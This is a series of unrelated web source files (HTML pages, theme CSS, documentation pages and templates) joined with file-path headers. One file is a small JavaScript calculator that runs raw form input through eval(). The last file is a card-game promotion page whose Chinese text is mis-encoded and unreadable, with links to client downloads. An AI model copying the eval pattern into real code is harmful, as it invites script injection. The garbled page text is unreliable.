<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
<tr>
<td align="left" class="footer">
Generated by Epydoc 3.0.1 on Sat May 9 06:30:59 2015
</td>
<td align="right" class="footer">
<a target="mainFrame" href="http://epydoc.sourceforge.net"
>http://epydoc.sourceforge.net</a>
</td>
</tr>
</table>
<script type="text/javascript">
<!--
// Private objects are initially displayed (because if
// javascript is turned off then we want them to be
// visible); but by default, we want to hide them. So hide
// them unless we have a cookie that says to show them.
checkCookie();
// -->
</script>
</body>
</html>
|
src/index.html | JoeEcob/joeecob.github.io | <!DOCTYPE html>
<html lang="en-gb">
<head>
<title>Joe Ecob - Developer - Manchester</title>
<meta charset="utf-8">
<meta name="author" content="Joe Ecob">
<meta name="description" content="Born in the shire, emigrated to the north.">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/site.css">
<link rel="icon" type="image/png" href="assets/favicon.png">
</head>
<body>
<section class="center-box">
<h1>Joe Ecob</h1>
<p>Developer based in Manchester, UK.</p>
<div class="links">
<a href="https://github.com/JoeEcob" title="Github">Github</a>
<a href="https://uk.linkedin.com/in/JoeEcob" title="LinkedIn">LinkedIn</a>
<a href="https://stackoverflow.com/users/3294938/ecobob" title="Stack Overflow">Stack Overflow</a>
<a href="mailto:me@joeecob.uk" title="Email">Email</a>
</div>
</section>
</body>
</html>
|
ben343/src/main/resources/static/bower_components/angular-carousel/dist/angular-carousel.css | Ben-J/ben343 | input[type=range] {
width: 300px; }
ul[rn-carousel] {
overflow: hidden;
padding: 0;
white-space: nowrap;
position: relative;
-webkit-perspective: 1000px;
-ms-perspective: 1000px;
perspective: 1000px;
-ms-touch-action: pan-y;
touch-action: pan-y; }
ul[rn-carousel] > li {
color: black;
-webkit-backface-visibility: hidden;
-ms-backface-visibility: hidden;
backface-visibility: hidden;
overflow: visible;
vertical-align: top;
position: absolute;
left: 0;
right: 0;
white-space: normal;
padding: 0;
margin: 0;
list-style-type: none;
width: 100%;
height: 100%;
display: inline-block; }
/* prevent flickering when moving buffer */
ul[rn-carousel-buffered] > li {
display: none; }
ul[rn-carousel-transition="hexagon"] {
overflow: visible; }
/* indicators */
div.rn-carousel-indicator span {
cursor: pointer;
color: #666; }
div.rn-carousel-indicator span.active {
color: white; }
/* prev/next controls */
.rn-carousel-control {
-webkit-transition: opacity 0.2s ease-out;
transition: opacity 0.2s ease-out;
font-size: 2rem;
position: absolute;
top: 40%;
opacity: 0.75;
cursor: pointer; }
.rn-carousel-control:hover {
opacity: 1; }
.rn-carousel-control.rn-carousel-control-prev {
left: 0.5em;
font-size: 35px;
color: white; }
.rn-carousel-control.rn-carousel-control-prev:before {
content: "<"; }
.rn-carousel-control.rn-carousel-control-next {
right: 0.5em;
font-size: 35px;
color: white; }
.rn-carousel-control.rn-carousel-control-next:before {
content: ">"; } |
calculator.html | colingell/Javascript-Calculator | <!DOCTYPE html>
<html>
<head>
<meta charset=utf-8 />
<title>JS Bin</title>
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<style>
article, aside, figure, footer, header, hgroup,
menu, nav, section { display: block; }
</style>
</head>
<body>
<form name="Calc" action="--WEBBOT-SELF--" method="POST">
<p>
Number of Adults:
<input type="text" name="num1" size="12" tabindex="1" value="0">
<br>
Number of Children:
<input type="text" name="num2" size="12" tabindex="2" value="0">
<br> Price £ : <input type="text" name="Input" size="17" tabindex="3">
</p>
<input type="button" name="sum" value="Calculate" OnClick="aplusb(this.form)" tabindex="4">
<script>
function aplusb(form) {
a=eval(Calc.num1.value);
f=eval (Calc.num2.value);
if (a > 0)
{
b= 5;
c=a * b;
d= 20;
e= 15;
g= 5;
h=f * 5;
Calc.Input.value = c - b + d + h;
}
else if (f > 0)
{
b= 5;
c=f * b;
d= a * b;
e= 15;
Calc.Input.value = c - b + e ;
}
}
</script>
</form>
</body>
</html> |
wp-content/themes/mercare_vn/colors/css/orange.css | dinhkk/khachsanviethung | /******************************************
*** YT Framework: CSS ***
*******************************************/
/* -----------------------*/
/* General style */
/* -----------------------*/
a, div.userBlock h2,
div.itemListCategory h2,
h1.componentheading, .componentheading {color:#fc7a00;}
a:hover, div.userBlock h2:hover,
div.itemListCategory h2:hover,
h1.componentheading:hover,
.componentheading:hover {color:#fd9b42;}
/*Main menu*/
/*CSS menu*/
ul.navi li.level1.active div.separator.level1, ul.navi li.level1.active a.level1,
ul.navi div.level1.havechild:hover, ul.navi a.level1:hover, ul.navi ul.level2:hover + div.separator{color:#ff7a01;}
ul.navi li.level1:hover div.separator.level1,
ul.navi li.level1:hover a.level1 {color:#ff7a01;}
ul.navi li.level1.hover div.separator.level1 span.menu-title,
ul.navi li.level1.hover a.level1 span.menu-title{color:#ff7a01;}
ul.navi li.level2:hover div.separator.level2,
ul.navi li.level2:hover a.level2 ,
ul.navi li.level3:hover div.separator.level3,
ul.navi li.level4:hover div.separator.level4,
ul.navi li.level5:hover div.separator.level5,
ul.navi li.level6:hover div.separator.level6,
ul.navi li.level7:hover div.separator.level7,
ul.navi li.level8:hover div.separator.level8,
ul.navi li.level9:hover div.separator.level9,
ul.navi li.level3:hover a.level3,
ul.navi li.level4:hover a.level4,
ul.navi li.level5:hover a.level5,
ul.navi li.level6:hover a.level6,
ul.navi li.level7:hover a.level7,
ul.navi li.level8:hover a.level8,
ul.navi li.level9:hover a.level9 {
color: #ff7a01;
}
ul.navi li.level2.active div.separator.level2,
ul.navi li.level3.active div.separator.level3,
ul.navi li.level4.active div.separator.level4,
ul.navi li.level2.active a.level2,
ul.navi li.level3.active a.level3,
ul.navi li.level4.active a.level4{
color: #ff7a01;
background: url("../images/menu-arrow2.png") no-repeat 2px 13px ;
}
ul.navirtl li.level2.active div.separator.level2,
ul.navirtl li.level3.active div.separator.level3,
ul.navirtl li.level4.active div.separator.level4,
ul.navirtl li.level2.active a.level2,
ul.navirtl li.level3.active a.level3,
ul.navirtl li.level4.active a.level4{
background: url(../images/rtl/menu-arrow2.png) no-repeat 99% 14px ;
}
ul.navi li.level2:hover div.separator.level2,
ul.navi li.level2:hover a.level2{
background: url("../images/menu-arrow2.png") no-repeat 2px 9px ;
}
ul.navi li.level3:hover div.separator.level3,
ul.navi li.level3:hover a.level3 {
background: url("../images/menu-arrow2.png") no-repeat 2px 13px ;
}
ul.navi li.level2.havechild {background: url(../images/arrow-sub.png) no-repeat 97% center;}
ul.navirtl li.level2.havechild {background-image: url(../images/rtl/arrow-sub.png);}
ul.navirtl li.level2:hover div.separator.level2,
ul.navirtl li.level2:hover a.level2{
background-image: url(../images/rtl/menu-arrow2.png);
background-position: 99% 10px ;
}
ul.navirtl li.level3:hover div.separator.level3,
ul.navirtl li.level3:hover a.level3,
ul.navirtl li.level3:hover div.separator.level4,
ul.navirtl li.level3:hover a.level4{
background-image: url(../images/rtl/menu-arrow2.png);
background-position: 99% 14px ;
}
/*CSS Dropline*/
ul#droplinenavigator.navi ul.level2{background: #df7512;}
ul#droplinenavigator.navi li.level2{border-right: 1px solid #be6310;}
ul#droplinenavigator.navi li.level2:hover div.separator.level2,
ul#droplinenavigator.navi li.level2:hover a.level2,
ul#droplinenavigator.navi li.level2 div.active.level2,
ul#droplinenavigator.navi li.level2 a.active.level2{background: #f37e10;}
/* -----------------------------*/
/* Module variations */
/* -----------------------------*/
/* Suffix class: Background */
div.moduletable.background1 h3.yt-mod-title,
div.moduletable.background2 h3.yt-mod-title{color:#fc7a00;}
div.title-default h3.yt-mod-title{background: #fc7a00;}
/* ----------------------------*/
/* Block: yt_header */
/* ----------------------------*/
#yt_header{background-color:#f25d0b;}
/* -----------------------------*/
/* Custom Module */
/* -----------------------------*/
#yt_spotlight3 .yt-main-in1{background-color: #fc7a00;}
#yt_spotlight3 ul.menu li:hover {background-color: #fc9433;}
#yt_spotlight3 .yt-position-inner {
border: none;
border-right: 1px solid #f4a65c;box-shadow: 1px 0 0 #d86900;
}
.rtl #yt_spotlight3 .yt-position-inner {
border: none;
border-left: 1px solid #f4a65c;box-shadow: -1px 0 0 #d86900;
}
#footnav .moduletable{background-color:#fc7a00;}
ul.latestnews li > a:hover{color: #fc7a00;}
ul.social > li > div:hover{border-color: #ff912a;color: #fc7a00;}
button,.button,
button.form-submit-button{background-color:#fc7a00}
div.newletter > .button{background-color: #47a4f1;}
div.yt_so_article_theme .title_slider_theme{color: #fc7a00;}
div.so_readmore > a{background-color: #fc7a00;}
.yt-switch_modes{background: #fc7a00;}
#yt_footer #footnav li#current a,
#yt_footer #footnav li a:hover,
#yt_footer #footnav li a#active_menu-nav{
color: #bfd842;
}
dl.search-results .highlight{background: #fc7a00;}
div.box-oranges{background-image: url("../images/find-bg.png") ;background-color: #a5ca00;}
div.box-oranges > div.moduletable-inner{background: rgba(167,201,0,0.4);border-color: #b6d231;}
div.box-oranges input.form-textbox,
div.box-oranges input.form-textarea{background-color: #c2db51;}
ul.form-section li.form-line .styled-select{background-color: #c2db51;}
div.news-orange .widget-wrap h2 a{color: #48a3f2;}
div.news-orange div.sj-news3 > div.post a.readon {background: url("../images/arrow-sub.png") no-repeat scroll 4px 0 ;}
.rtl div.news-orange div.sj-news3 > div.post a.readon {background: url("../images/rtl/arrow-sub.png") no-repeat scroll 4px 0 ;}
/* JS Slide*/
div.cover-theme1 .next:hover{background: url("../images/slide-arrow.png") no-repeat -34px 0 ; }
div.cover-theme1 .preview:hover{background: url("../images/slide-arrow.png") no-repeat 0 0 ; }
div.yt_article_slider2{border: 3px solid #febe80;}
ol.sj-news4 > li.post:hover > .post-inner > a{color: #fc7a00;}
div.yt_so_article_theme .so_navigation_hor .so_pre_hor:hover{background: url(../images/slide-arrow2.png) no-repeat 0 -1px;}
div.yt_so_article_theme .so_navigation_hor .so_next_hor:hover{background: url(../images/slide-arrow2.png) no-repeat right -1px;}
div.yt_article_slider2 .so_navigation_hor .so_pre_hor:hover{background: url(../images/slide-arrow3.png) no-repeat 0 -1px;}
div.yt_article_slider2 .so_navigation_hor .so_next_hor:hover{background: url(../images/slide-arrow3.png) no-repeat right -1px;}
/*SJ- News */
div.sj-news2 .post .frame-img{background: url(../images/frame-photo.png) no-repeat right 0;}
div.sj-news2 .post .frame-img:hover{background-position: 0 0;}
div.sj-news3 > div.post a.readon{background:url(../images/arrow-sub.png) no-repeat 4px 0;}
div.sj-news2 .post h2 > a:hover{color: #fc7a00;}
div.sj-news2 .post .post-inner:hover h2 > a{font-weight:normal;color: #fc7a00;}
div.widget-wrap.default .image-wrap:hover:after {box-shadow: 0 0 0 4px rgba(252, 122, 0, 0.8) inset;}
.rtl div.sj-news3 > div.post a.readon{background:url(../images/rtl/arrow-sub.png) no-repeat 99% 0;}
/*Sj Content Accordion*/
div.yt-accordion h3.yt-toggler{background-color: #fc7a00 ;}
div.yt-accordion h3.yt-toggler.open span{color: #fc7a00;}
/*Module Footer*/
#foot_logo a.yt-logo{background:url("../images/viethung-logo-small.png") no-repeat scroll 0 0 / 100px 60px transparent;}
#yt_footer #footnav li{border-right: 1px solid #f4a65c;box-shadow: 1px 0 0 #d86900;}
/* ------------------------------*/
/* Components Content */
/* ------------------------------*/
.com_content .blog a.readmore,
div.itemCommentsForm form input#submitCommentButton{background-color:#fc7a00;}
.com_content .blog a.readmore:hover{background-color: #8c8c8c;}
div.items-more ol li,
div.block-related ul.related-items li,
div.itemAuthorLatest ul li:hover,
div.itemRelated ul li:hover{background: url(../images/list-item.png) no-repeat 0 6px;}
ul.pagination li > span:hover,
ul.pagination li > strong:hover{border-color: #fc7a00;}
ul.pagination a:hover{color: #fc7a00;}
/* -- Component k2 -- */
div.catItemReadMore a, a.subCategoryMore,
div.subCategory:hover a.subCategoryMore:hover{background-color: #fc7a00;}
div.userItemReadMore a,div.tagItemReadMore a{background-color: #fc7a00;}
div.k2LatestCommentsBlock ul li span.lcUsername > a:hover{color: #fc7a00;}
div.catItemCommentsLink a:hover,.itemTags li a:hover,
.catItemTags li a:hover{color:#fc7a00;}
div.itemAuthorLatest ul li > a:hover,.userItemTagsBlock li a:hover,
div.itemRelated ul li > a:hover{color: #fc7a00;}
div.itemComments ul.itemCommentsList li span.commentLink a{color: #fc7a00;}
div.k2TagCloudBlock a:hover{background: #fc7a00;color: #fff;}
div.catItemCommentsLink a:hover,
div.catItemTagsBlock:hover{border-color: #fc7a00;}
/* -- Forum Kunena -- */
body #Kunena .kblock div.kheader, body #Kunena div.kblock > div.kheader{background: #fc7a00;}
#ktab div.moduletable{background: #fc7a00;}
#Kunena #ktab a{color: #fff;}
#Kunena #ktab li, #Kunena #ktab div.moduletable ul.menu li{border-right: 1px solid #d36e0f;}
#Kunena #ktab ul.menu li a:hover, #Kunena #ktab ul.menu li a:focus{
background:#d36e0f;color: #fff;
}
#Kunena .button, #Kunena input.kbutton,
#Kunena .kattachment-remove, #Kunena .kattachment-insert{
background: #fc7a00;
}
/* ------------------------------*/
/* RTL Languages */
/* ------------------------------*/
.rtl div.items-more ol li,
.rtl div.block-related ul.related-items li,
.rtl div.itemAuthorLatest ul li:hover,
.rtl div.itemRelated ul li:hover{background:url(../images/rtl/list-item.png) no-repeat 100% 6px;} |
_src/Help/content/tab_about.html | kerido/koapch | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>About Tab</title>
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div class="Content">
<p><img class="TabImageSmall" src="../images/tab_about.png" alt="About tab" /></p>
<ol>
<li>
<p class="ParagraphTitle"><span class="EntityName">Version</span> label</p>
<p>
Displays the current version and build number of KO Approach. Please provide
this string when sending feedback or reporting an error.
</p>
</li>
<li>
<p class="ParagraphTitle"><span class="EntityName">Send feedback</span> hyperlink</p>
<p>
Launches your default e-mail client and creates a new email message.
Share your thoughts with us on how we could improve KO Approach, report a bug, or simply ask a question.
Remember, you can help make this product better. We value your opinion!
</p>
</li>
<li>
<p class="ParagraphTitle"><span class="EntityName">KO Approach homepage</span> hyperlink</p>
<p>
Launches your default Web browser and points it to KO Approach Web site. Please visit our website frequently
to download new versions and updates!
</p>
</li>
</ol>
</div>
<script type="text/javascript" src="functions.js"></script>
</body>
</html>
|
output/build/directfb-1.4.17/docs/html/IDirectFB_SetVideoMode.html | twobob/buildroot-kindle | <HTML>
<STYLE>
<!--
A{textdecoration:none}
-->
</STYLE>
<STYLE type="text/css">
A:link, A:visited, A:active { text-decoration: none; }
</STYLE>
<HEAD>
<TITLE>IDirectFB - SetVideoMode [DirectFB Reference Manual]</TITLE>
</HEAD>
<BODY bgcolor=#F8F4D8 link=#2369E0 vlink=#2369E0 text=#232323>
<TABLE width=100% bgcolor=#C0B090 border=0 cellspacing=0 cellpadding=5>
<TR><TD width=30%>
<A href="http://www.directfb.org"><IMG border=0 src="dfb_logo-alpha.png"></A>
</TD><TD align=right>
<A href="index.html"><FONT size=+3 color=#203040>Reference Manual - 1.4.17</FONT></A>
</TD></TR>
<TR><TD colspan=2 align=center bgcolor=#284460>
<TABLE border=0 cellspacing=0 cellpadding=0>
<TR><TD nowrap align=right width=50%>
<BIG><FONT color=#D0D0D0><A href="IDirectFB.html"> <FONT color=#D0D0D0>IDirectFB</FONT></A> </FONT></BIG>
</TD><TD nowrap align=left width=50%>
<BIG><FONT color=#E09040> SetVideoMode</FONT></BIG>
</TD></TR>
</TABLE>
</TD></TR>
</TABLE>
<H4>
Switch the current video mode (primary layer).
</H4>
<TABLE border=0 cellspacing=4 cellpadding=2 bgcolor=#F8F8F0>
<TR><TD colspan=5><I><FONT color=#425469><A href="types.html#DFBResult">DFBResult</A> <b>SetVideoMode (</b></FONT></I></TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
<A href="IDirectFB.html">IDirectFB</A>
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B>*</B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>thiz,</B></FONT>
</TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
int
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B></B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>width,</B></FONT>
</TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
int
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B></B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>height,</B></FONT>
</TD></TR>
<TR><TD width=50>
</TD><TD valign=top>
int
</TD><TD width=20> </TD><TD align=right>
<FONT color=#424242><B></B></FONT>
</TD><TD valign=top>
<FONT color=#234269><B>bpp</B></FONT>
</TD></TR>
<TR><TD colspan=5><I><FONT color=#425469><b>);</b></FONT></I></TD></TR>
</TABLE>
</P>
<P>
If in shared cooperative level this function sets the
resolution of the window that is created implicitly for
the primary surface.
</P><P>
The following values are valid for bpp: 2, 8, 12, 14, 15, 18, 24, 32.
These will result in the following formats, respectively: DSPF_LUT2,
DSPF_LUT8, DSPF_ARGB4444, DSPF_ARGB2554, DSPF_ARGB1555, DSPF_RGB16,
DSPF_RGB18, DSPF_RGB24, DSPF_RGB32.
</P>
<TABLE width=100% bgcolor=#E0E8F0 border=0 cellspacing=1 cellpadding=3>
<TR><TD width=100>
<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/"> <img alt="Creative Commons License" style="border-width:0" border="0" src="http://i.creativecommons.org/l/by-sa/3.0/88x31.png" /> </a> </TD><TD>
This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/"> Creative Commons Attribution-Share Alike 3.0 License</a> </TD></TR>
</TABLE>
</BODY>
</HTML>
|
templates/loginfo.html | AntonioMtn/NZBMegaSearch | <!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>NZB MegasearcH</title>
<link rel="stylesheet" type="text/css" href="static/reset2.css" />
<link rel="stylesheet" type="text/css" href="static/style.css" />
</head>
<body>
<div id="framecontent">
<div class='title_tablemenu'>
<a href="main"><img src="static/title.png" width="230" height="" alt="NZBmegasearcH"/></a>
</div>
<table class='tablemenu_fl'>
<tbody>
<tr>
<td ><a href="#tbl00" class='tablemenu_fl_a'> >> Log </a></td>
</tr>
</tbody>
</table>
</div>
<div id="maincontent">
<div id="container">
<div class="boxed_paragraph">
<p class="dense">
{% for lgi in loginfo -%}
{{ lgi}} <br>
{% endfor %}
</p>
</div>
</div>
</div>
</body>
</html>
|
wulu/2015.11.23/qipai/qipaiyouxipingtai/1530.html | bylu/Test | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>ÌìɽÓÎÏ·ÖÐÐÄÊÇÄúÐÝÏÐÓéÀֵĺÃÈ¥´¦</title>
<meta name="keywords" content="Ììɽ,ÓÎÏ·ÖÐÐÄ,ÐÝÏÐ,ÀÖµÄ,ºÃÈ¥´¦,Ëæ×Å,ÈËÃÇ,Éú»îˮƽ,Ìá" />
<meta name="description" content="Ëæ×ÅÈËÃÇÉú»îˮƽµÄÌá¸ß£¬ÏÖÔÚ´ó¼Ò¶¼ÓÐÁËÖÇÄÜÊÖ»úºÍµçÄÔ¡£¸ß¿Æ¼¼µÄ²úÆ·´ó´ó·á¸»ÁËÎÒÃǵÄÒµÓàÉú»î¡£ÒÔǰ´ó¼Ò×ÜÊÇ·¢³îϰàÖ®ºó¿ÉÒԸɵãʲô£¬ÏÖÔÚÓÐÁ˵çÄÔÓÐÁËÍøÂ磬´ó¼Ò¿ÉÒÔÔÚ¼ÒÏíÊܵ½ÓÎÏ·µÄÀÖȤ¡£Äú¿ÉÒÔµ½ ÌìɽÓÎÏ·ÖÐÐÄ Õâ¸öµØ·½È¥ÏÂÔØÒ»Ð©ºÃÍæµÄСÓÎÏ·¡£Õâ" />
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/style.css">
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/p.css">
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/common.css">
<script tyep="text/javascript" src="/qipai/templets/default/js/jquery-1.8.3.min.js"></script>
</head>
<body>
<DIV class=top>
<DIV class=c_960>
<DIV class=top-nav><SPAN>Hi£¬»¶ÓÀ´µ½789ÓÎÏ·ÖÐÐÄ£¡</SPAN></DIV>
<DIV><!-- logo -->
<DIV style="POSITION: relative" class=logo><A href="http://www.789game.com"></A></DIV>
<DIV class=nav>
<UL>
<LI><a href="http://www.789game.com/" target="_blank">ÍøÕ¾Ê×Ò³</a></LI>
<li><a href='/qipai/qipaiyouxipingtai/' target="_blank" >ÆåÅÆÓÎϷƽ̨</a></li>
<li><a href='http://www.789game.com/GameIntroduction.aspx' target="_blank" >ÓÎÏ·½éÉÜ</a></li>
<li><a href='http://www.789game.com/NewsList.aspx' target="_blank" >ÐÂÎŹ«¸æ</a></li>
<li><a href='http://shuihu.789game.com/' target="_blank" >½Ö»úˮ䰴«</a></li>
<li><a href='http://www.789game.com/xinshoubangzhu.html' target="_blank" >ÐÂÊÖ°ïÖú</a></li>
<li><a href='http://buyu.789game.com/' target="_blank" >½Ö»úǧÅÚ²¶Óã</a></li>
</UL>
</DIV>
<!-- µ¼º½À¸½áÊø -->
</DIV>
</DIV>
</DIV>
<div style="BORDER: #cdcdcd 1px solid; margin-top:10px; width:960px; margin:5px auto">
<div id="lunbobg">
<ul>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=439"> <img src="/qipai/templets/default/images/1-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe"> <img src="/qipai/templets/default/images/2-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=2006"> <img src="/qipai/templets/default/images/3-1.jpg" width="960" height="424"></a></a></li>
</ul>
</div>
</div>
<div class="main">
<div id=p_con><!--Ò³Ãæ×ó²à²¿·Ö ¿ªÊ¼ -->
<div class=p_l>
<div class=location>
<img src="/qipai/templets/default/images/flag.png" width=16 height=16> µ±Ç°Î»ÖÃ:</strong><a href='/qipai'>ÆåÅÆÓÎÏ·</a> > <a href='/qipai/qipaiyouxipingtai/'>ÆåÅÆÓÎϷƽ̨</a> >
</div>
<div id=pnlContent>
<h1 class=que-title>ÌìɽÓÎÏ·ÖÐÐÄÊÇÄúÐÝÏÐÓéÀֵĺÃÈ¥´¦</h1>
<div class="articelinfo"><span>×÷Õߣºadmin</span><span>·¢²¼Ê±¼ä£º2015-01-14</span></div>
<div class=que-content>
<div>
</div>
<div>
Ëæ×ÅÈËÃÇÉú»îˮƽµÄÌá¸ß£¬ÏÖÔÚ´ó¼Ò¶¼ÓÐÁËÖÇÄÜÊÖ»úºÍµçÄÔ¡£¸ß¿Æ¼¼µÄ²úÆ·´ó´ó·á¸»ÁËÎÒÃǵÄÒµÓàÉú»î¡£ÒÔǰ´ó¼Ò×ÜÊÇ·¢³îϰàÖ®ºó¿ÉÒԸɵãʲô£¬ÏÖÔÚÓÐÁ˵çÄÔÓÐÁËÍøÂ磬´ó¼Ò¿ÉÒÔÔÚ¼ÒÏíÊܵ½ÓÎÏ·µÄÀÖȤ¡£Äú¿ÉÒÔµ½<strong>ÌìɽÓÎÏ·ÖÐÐÄ</strong>Õâ¸öµØ·½È¥ÏÂÔØÒ»Ð©ºÃÍæµÄСÓÎÏ·¡£Õâ¸öƽ̨ÊÇרÃż¯ºÏÁËÖÚ¶àµÄºÃÍæµÄСÓÎÏ·µÄÒ»¸öÏÂÔØµÄµØ·½¡£</div>
<div>
<img alt="" src="/qipai/uploads/allimg/150114/1-150114102R6119.jpg" style="width: 620px; height: 348px;" /></div>
<h2>
ÌìɽÓÎÏ·ÖÐÐÄСÓÎÏ·</h2>
<div>
ÌìɽÓÎÏ·ÖÐÐÄÕâÀïÓÐ×îеÄ×îºÃÍæµÄСÓÎÏ·£¬ÒÔºóÄúÔÙÒ²²»ÓÃΪµÈ³µ×ø³µÃ»Ê¸ɶø·¢³îÁË¡£ÏÖÔڵͼÊа×ÁìÒ»°ãµÄͨÇÚʱ¼ä¶¼»áÔÚÒ»¸öСʱÒÔÉÏ£¬ËùÒÔÕâÊÇÒ»¶Î·Ç³£Âþ³¤¶øÓÖÄѰ¾µÄʱ¼ä£¬ÔÚÕâ¶Îʱ¼äÀïÓеÄÈËÔÚ˯¾õ£¬ÓеÄÈËÔÚ³Ô¶«Î÷£¬µ«ÊǸü¶àµÄÈËȴûÓÐʲôºÃ¸ÉµÄ£¬ÄÇôÄú¿ÉÒÔµ½ÕâÀïÀ´ÏÂÔØµãСÓÎÏ·£¬ÔڵȳµºÍ×ø³µµÄʱºò¾Í¿ÉÒÔ´ò·¢Ê±¼äÁË¡£ÕâÀïÃæµÄÓÎÏ·ºÜ¶à¶¼ÊÇÊÖ»úСÓÎÏ·£¬ÌرðÊʺÏÉϰà×åÍæ£¬ÕâСÓÎÏ·ÓÐÒæÖÇÀàµÄ£¬Óоº¼¼ÀàµÄ£¬Ê®·ÖÓÐȤ£¬Ò»·½Ãæ¿ÉÒÔÈÃÄú¶È¹ýÎÞÁĵÄʱ¹â£¬ÁíÍ⻹¿ÉÒÔΪÄúµÄÉú»î´øÀ´Ò»Ë¿µÄÀÖȤ¡£</div>
<h3>
ÌìɽÓÎÏ·ÖÐÐÄÊÍ·ÅѹÁ¦</h3>
<div>
ÏÖÔÚ´ó¼ÒµÄ¹¤×÷ѹÁ¦¶¼±È½Ï´ó£¬ÐèÒªÒ»¸öÊÍ·ÅѹÁ¦µÄ³ö¿Ú£¬ÄÇôÄú¿ÉÒÔͨ¹ýÌìɽÓÎÏ·ÖÐÐÄÕâÀïµÄÓÎÏ·À´ÎªÄúÊÍ·ÅѹÁ¦¡£ÕâÊÇÒ»¸ö»ã¼¯ÖÚ¶àºÃÍæÓÎÏ·µÄµØ·½£¬Í¬Ê±£¬Äú¿ÉÒÔÔÚÕâÀïÕÒµ½ºÍÄúÁĵÃÀ´µÄÅóÓÑ£¬´ó¼Ò¿ÉÒÔÒ»Æð½»Á÷ÍæÓÎÏ·µÄÐĵã¬ÊÇÒ»¸ö·Ç³£²»´íµÄ½»ÓÑÆ½Ì¨¡£»¶ÓÄúµ½ÕâÀïÀ´ÏÂÔØ×Ô¼ºÏ²»¶µÄÓÎÏ·¡£</div>
</div>
<div class=pre-nex>ÉÏһƪ£º<a href='/qipai/qipaiyouxipingtai/1529.html'>Íþº£Ô¶º½ÓÎÏ·ÖÐÐÄÊ×Ò³Âú×ãÍæ¼ÒµÄÓÎÏ·ÐèÇó</a> ÏÂһƪ£º<a href='/qipai/qipaiyouxipingtai/1531.html'>878ÓÎÏ·ÖÐÐĹÙÍøÏÂÔØÎªÄúÌṩ°²È«µÄÓÎÏ·</a> </div>
</div>
</div>
<!--ÓÒ²àÏÂÔØ begin-->
<DIV class=p_r_xiazai>
<DIV class=r_ad>
<DIV class=dl_client_v2>
<A style="BACKGROUND-POSITION: 22px -536px" href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe" class=client_dl title=ÏÂÔØ¿Í»§¶Ë rel=nofollow></A>
</DIV>
</DIV>
</div>
<div class="ewmDown">
<div class="anzhuoDown">
<a href="http://download.6513.com/phoneGame/590145BY.apk" class="dowmForA" rel="nofollow"></a>
</div>
<div class="appleDown">
<a href="https://itunes.apple.com/us/app/jie-ji-jin-chan-bu-yu-mian/id1022745046?l=zh&ls=1&mt=8" class="dowmForI" target='_blank' rel="nofollow"></a>
</div>
</div>
<DIV class=p_r>
<DIV class=tags>
<DL class=box_dl>
<DT>ÓÎÏ·½éÉÜ</DT>
<DIV class=tags>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=610" target="_blnak">½ð󸲶Óã</A>
<A href="http://shuihu.789game.com/" target="_blnak">°ÙÒ×ˮ䰴«</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=601" target="_blnak">´óÊ¥ÄÖº£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=203" target="_blnak">ˮ䰴«</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=2040" target="_blank">нð󸲶Óã</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=6" target="_blank">789Ó®ÈýÕÅ</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=361" target="_blank">¶þÈËÂ齫</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=102" target="_blank">¶þÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=27" target="_blank">ËÄÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=200" target="_blank">¶·µØÖ÷</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=5501" target="_blank">ÀîåÓÅüÓã</A>
<A href="http://www.789game.com/" target="_blank">ÆåÅÆÆ½Ì¨</A>
<A href="http://www.789game.com/NewsShow.aspx?XID=130" target="_blank">ÓÎÏ·Ìü²¶Óã´ïÈË</A>
<A href="http://buyu.789game.com/" target="_blank">½Ö»úǧÅÚ²¶Óã¹ÙÍø</A>
</DIV>
</DL>
</DIV>
